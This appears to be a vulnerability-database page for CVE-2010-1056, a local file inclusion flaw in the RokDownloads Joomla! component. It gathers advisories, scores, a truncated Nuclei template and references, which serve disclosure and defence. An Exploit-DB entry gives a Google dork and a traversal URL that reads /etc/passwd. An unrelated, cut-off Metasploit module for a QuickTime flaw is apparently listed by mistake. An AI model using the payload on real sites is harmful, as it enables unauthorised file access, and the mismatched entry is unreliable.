CVE-2010-1056
published 2010-03-23
CVE-2010-1056: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute…
Priority P348 | medium | 6.8 | CVSS 2.0
AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 11.41% (95.5th percentile)
Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rockettheme | com_rokdownloads | <= 1.0 | — |
| rockettheme | com_rokdownloads | — | — |
| rockettheme | com_rokdownloads | — | — |
| rockettheme | com_rokdownloads | — | — |
| rockettheme | com_rokdownloads | — | — |
| rockettheme | com_rokdownloads | — | — |
| rockettheme | com_rokdownloads | — | — |
| rockettheme | com_rokdownloads | — | — |
| rockettheme | com_rokdownloads | — | — |
| rockettheme | com_rokdownloads | — | — |
VulDB
Rockettheme Com Rokdownloads up to 0.90 index.php controller path traversal (EDB-11760 / Nessus ID 43636)
vuldb·2026-05-03·CVSS 6.8
CVE-2010-1056 [MEDIUM] Rockettheme Com Rokdownloads up to 0.90 index.php controller path traversal (EDB-11760 / Nessus ID 43636)
A vulnerability was found in Rockettheme Com Rokdownloads up to 0.90. It has been declared as problematic. This affects an unknown part of the file index.php. The manipulation of the argument controller results in path traversal.
This vulnerability is identified as CVE-2010-1056. The attack can be executed remotely. Additionally, an exploit exists.
It is recommended to upgrade the affected component.
GHSA
GHSA-7gjv-7778-36m8: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1
ghsa_unreviewed·2022-05-02
CVE-2010-1056 [MEDIUM] CWE-22 GHSA-7gjv-7778-36m8: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1
Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
No detection rules found.
Exploit-DB
QuickTime Streaming Server - 'parse_xml.cgi' Remote Execution (Metasploit)
exploitdb·2010-07-03
CVE-2003-0050 QuickTime Streaming Server - 'parse_xml.cgi' Remote Execution (Metasploit)
---
##
# $Id: qtss_parse_xml_exec.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'QuickTime Streaming Server parse_xml.cgi Remote Execution',
'Description' => %q{
The QuickTime Streaming Server contains a CGI script that is vulnerable
to metacharacter injection, allow arbitrary commands to be executed as root.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9669 $',
'References' =>
[
[ 'OSVDB', '1056
Exploit-DB
Joomla! Component com_rokdownloads - Local File Inclusion
exploitdb·2010-03-15
CVE-2010-1056 Joomla! Component com_rokdownloads - Local File Inclusion
---
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [[email protected]]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : Joomla Component com_rokdownloads
.:. Bug Type : Local File Inclusion [LFI]
.:. Dork : inurl:"com_rokdownloads"
####################################################################
===[ Exploit ]===
www.site.com/index.php?option=com_rokdownloads&controller=[LFI]
www.site.com/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00
####################################################################
Nuclei
Joomla! Component com_rokdownloads - Local File Inclusion
nuclei·CVSS 6.8
CVE-2010-1056 [MEDIUM] Joomla! Component com_rokdownloads - Local File Inclusion
A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
Template:
id: CVE-2010-1056
info:
  name: Joomla! Component com_rokdownloads - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
  reme
http://osvdb.org/62972
http://packetstormsecurity.org/1003-exploits/joomlarokdownloads-lfi.txt
http://secunia.com/advisories/38982
http://www.exploit-db.com/exploits/11760
http://www.rockettheme.com/extensions-updates/638-rokdownloads-10-released
http://www.securityfocus.com/bid/38741
https://exchange.xforce.ibmcloud.com/vulnerabilities/56898